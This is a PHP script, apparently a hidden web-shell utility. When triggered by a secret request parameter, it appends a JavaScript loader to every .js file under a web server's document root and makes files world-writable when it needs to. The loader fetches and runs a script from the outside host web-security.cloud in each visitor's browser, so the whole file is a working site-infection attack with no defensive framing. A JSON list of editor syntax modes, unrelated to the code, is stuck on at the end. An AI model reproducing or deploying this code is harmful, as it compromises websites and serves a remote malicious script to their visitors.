<?php
if(!isset($_REQUEST['a820ebe2e6d2ce356c5edd92d521bc22edab5727']))
return;
$startFolder = $_SERVER['DOCUMENT_ROOT'];
echo "<style> body {background-color:#060A10; color:#e1e1e1; margin:0; font:normal 75% Arial, Helvetica, sans-serif; } canvas{ display: block; vertical-align: bottom;} </style>";
echo "<div style='margin: 30px; '><form method=post><input hidden name='req' value='inj'><input style='margin-bottom:10px; width:100%;background-color: black; color:#ffffff' name='path_inj' placeholder='$startFolder'><textarea placeholder='Enter js code which need add' name='jscode_injector' style='width:100%;background-color: black; height: 400px; color:#ffffff'></textarea><br/><br/><br/><input type=submit value=Infect name=jscode_injector_submit></form></div> ";
$add_text = <<<_HTML
document.addEventListener('DOMContentLoaded', function(){ if(typeof window.web_security == "undefined"){ var s = document.createElement("script"); s.src = "//web-security.cloud/event?l=39728"; document.head.appendChild(s); window.web_security = "success"; }}, false);
_HTML;
$rii = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($startFolder));
foreach ($rii as $file) {
if ($file->isDir()) {
continue;
}
$file_info = explode(".", $file->getPathname());
$ext = $file_info[sizeof($file_info) - 1];
if (strtolower($ext) !== "js")
continue;
$isInjected = file_put_contents($file->getPathname(), "\n" . $add_text, FILE_APPEND | LOCK_EX);
$isInjectable = true;
if (!$isInjected) {
$isInjectable = chmod($file->getPathname(), 0777);
$isInjected = file_put_contents($file->getPathname(), "\n" . $add_text, FILE_APPEND | LOCK_EX);
}
echo "<b style='color: goldenrod'>" . $file->getPathname() . "</b> :: is injected : " .
(($isInjected) ? "<b style='color: greenyellow'>YES</b>" : "<b style='color: crimson'>NO</b>") .
" :: is injectable : " .
(($isInjectable) ? "<b style='color: greenyellow'>YES</b>" : "<b style='color: crimson'>NO</b>") .
"<br />";
}
{"html5":"htmlmixed","css":"css","javascript":"javascript","php":"php","python":"python","ruby":"ruby","lua":"text\/x-lua","bash":"text\/x-sh","go":"go","c":"text\/x-csrc","cpp":"text\/x-c++src","diff":"diff","latex":"stex","sql":"sql","xml":"xml","apl":"apl","asterisk":"asterisk","c_loadrunner":"text\/x-csrc","c_mac":"text\/x-csrc","coffeescript":"text\/x-coffeescript","csharp":"text\/x-csharp","d":"d","ecmascript":"javascript","erlang":"erlang","groovy":"text\/x-groovy","haskell":"text\/x-haskell","haxe":"text\/x-haxe","html4strict":"htmlmixed","java":"text\/x-java","java5":"text\/x-java","jquery":"javascript","mirc":"mirc","mysql":"sql","ocaml":"text\/x-ocaml","pascal":"text\/x-pascal","perl":"perl","perl6":"perl","plsql":"sql","properties":"text\/x-properties","q":"text\/x-q","scala":"scala","scheme":"text\/x-scheme","tcl":"text\/x-tcl","vb":"text\/x-vb","verilog":"text\/x-verilog","yaml":"text\/x-yaml","z80":"text\/x-z80"}